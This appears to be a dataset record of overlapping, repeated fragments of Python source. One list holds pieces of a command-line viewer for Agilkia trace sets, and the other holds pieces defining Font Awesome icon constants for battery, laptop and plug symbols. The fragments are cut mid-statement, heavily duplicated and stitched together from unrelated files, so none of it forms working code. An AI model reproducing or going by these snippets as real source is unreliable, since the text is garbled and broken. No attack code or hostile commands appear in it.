import textwrap import agilkia INDENT =", "if args.verbose: print(\"==== event chars ====\") ev_chars = traceset.get_event_chars() for action,ch in ev_chars.items():", "prints a one-line summary of each trace, plus some general statistics. If the", "of each trace, plus some general statistics. If the TraceSet is clustered, traces", "c in range(traceset.get_num_clusters()): print(f\"Cluster {c}:\") for (i, tr) in enumerate(traceset.traces): if clusters[i] ==", "in enumerate(traceset.traces): if clusters[i] == c: print(INDENT, tr.to_string(compress=repeats, color_status=args.status)) else: for tr in", "<gh_stars>1-10 # -*- coding: utf-8 -*- \"\"\" View the traces within an Agilkia", "summary statistics.\"\"\" parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter) parser.add_argument(\"-v\", \"--verbose\", help=\"show more information, such as", "csv file containing an event-to-char map.\") parser.add_argument(\"-n\", \"--noclusters\", help=\"view traces in-order, without clusters.\"," ]
[ "\"\\uf244\", # empty \"\\uf243\", # 1 quarter \"\\uf242\", # half \"\\uf241\", # 3", "# 3 quarters \"\\uf240\", # full ] FA_NO_BATTERY = \"\\uf00d \" + FA_BATTERY_LIST[4]", "'\\uf109' FA_PLUG = '\\uf1e6' FA_BUG = '\\uf188' FA_BATTERY_LIST = [ \"\\uf244\", # empty", "# empty \"\\uf243\", # 1 quarter \"\\uf242\", # half \"\\uf241\", # 3 quarters", "= [ \"\\uf244\", # empty \"\\uf243\", # 1 quarter \"\\uf242\", # half \"\\uf241\",", "\"\\uf242\", # half \"\\uf241\", # 3 quarters \"\\uf240\", # full ] FA_NO_BATTERY =", "FA_QUESTION = '\\uf128' FA_LAPTOP = '\\uf109' FA_PLUG = '\\uf1e6' FA_BUG = '\\uf188' FA_BATTERY_LIST", "FA_PLUG = '\\uf1e6' FA_BUG = '\\uf188' FA_BATTERY_LIST = [ \"\\uf244\", # empty \"\\uf243\",", "= '\\uf188' FA_BATTERY_LIST = [ \"\\uf244\", # empty \"\\uf243\", # 1 quarter \"\\uf242\",", "\"\\uf241\", # 3 quarters \"\\uf240\", # full ] FA_NO_BATTERY = \"\\uf00d \" +", "FA_LAPTOP = '\\uf109' FA_PLUG = '\\uf1e6' FA_BUG = '\\uf188' FA_BATTERY_LIST = [ \"\\uf244\",", "# 1 quarter \"\\uf242\", # half \"\\uf241\", # 3 quarters \"\\uf240\", # full", "1 quarter \"\\uf242\", # half \"\\uf241\", # 3 quarters \"\\uf240\", # full ]", "# half \"\\uf241\", # 3 quarters \"\\uf240\", # full ] FA_NO_BATTERY = \"\\uf00d", "'\\uf188' FA_BATTERY_LIST = [ \"\\uf244\", # empty \"\\uf243\", # 1 quarter \"\\uf242\", #", "= '\\uf109' FA_PLUG = '\\uf1e6' FA_BUG = '\\uf188' FA_BATTERY_LIST = [ \"\\uf244\", #", "FA_BUG = '\\uf188' FA_BATTERY_LIST = [ \"\\uf244\", # empty \"\\uf243\", # 1 quarter", "empty \"\\uf243\", # 1 quarter \"\\uf242\", # half \"\\uf241\", # 3 quarters \"\\uf240\",", "FA_BATTERY_LIST = [ \"\\uf244\", # empty \"\\uf243\", # 1 quarter \"\\uf242\", # half", "\"\\uf243\", # 1 quarter \"\\uf242\", # half \"\\uf241\", # 3 quarters \"\\uf240\", #", "[ \"\\uf244\", # empty \"\\uf243\", # 1 quarter \"\\uf242\", # half \"\\uf241\", #", "'\\uf128' FA_LAPTOP = '\\uf109' FA_PLUG = '\\uf1e6' FA_BUG = '\\uf188' FA_BATTERY_LIST = [", "= '\\uf1e6' FA_BUG = '\\uf188' FA_BATTERY_LIST = [ \"\\uf244\", # empty \"\\uf243\", #", "= '\\uf128' FA_LAPTOP = '\\uf109' FA_PLUG = '\\uf1e6' FA_BUG = '\\uf188' FA_BATTERY_LIST =", "quarter \"\\uf242\", # half \"\\uf241\", # 3 quarters \"\\uf240\", # full ] FA_NO_BATTERY", "half \"\\uf241\", # 3 quarters \"\\uf240\", # full ] FA_NO_BATTERY = \"\\uf00d \"", "'\\uf1e6' FA_BUG = '\\uf188' FA_BATTERY_LIST = [ \"\\uf244\", # empty \"\\uf243\", # 1" ]